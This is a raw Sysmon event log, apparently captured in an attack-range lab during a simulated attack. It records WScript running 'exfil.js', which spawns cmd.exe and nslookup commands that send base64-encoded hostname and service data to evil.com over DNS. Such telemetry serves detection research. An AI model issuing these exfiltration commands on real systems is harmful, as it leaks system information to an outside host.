14:21:38.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.228{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9244-000000005F02}2848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.228{2E1864BB-18E0-629A-6742-000000005F02}39765544C:\Windows\System32\WScript.exe{2E1864BB-18F2-629A-9244-000000005F02}2848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.228{2E1864BB-18F2-629A-9244-000000005F02}2848C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgxxkg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.213{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrkdfoh.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.182{2E1864BB-18F2-629A-9044-000000005F02}46406156C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-9144-000000005F02}4284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.182{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.182{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.182{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9144-000000005F02}4284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.182{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.182{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.182{2E1864BB-18F2-629A-8F44-000000005F02}64363384C:\Windows\system32\cmd.exe{2E1864BB-18F2-629A-9144-000000005F02}4284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.187{2E1864BB-18F2-629A-9144-000000005F02}4284C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F2-629A-8F44-000000005F02}6436C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrkdfoh.tmp 2>&1 10341000x8000000000000000211224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.160{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-9044-000000005F02}4640C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.160{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-9044-000000005F02}4640C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.144{2E1864BB-18F2-629A-9044-000000005F02}46406156C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-8F44-000000005F02}6436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.144{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9044-000000005F02}4640C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.129{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.129{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.129{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-8F44-000000005F02}6436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.129{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.129{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.129{2E1864BB-18E0-629A-6742-000000005F02}39762428C:\Windows\System32\WScript.exe{2E1864BB-18F2-629A-8F44-000000005F02}6436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.132{2E1864BB-18F2-629A-8F44-000000005F02}6436C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrkdfoh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.129{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlowmz.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.097{2E1864BB-18F2-629A-8D44-000000005F02}53844336C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-8E44-000000005F02}2812C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.097{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.097{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.097{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.097{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.097{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-8E44-000000005F02}2812C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 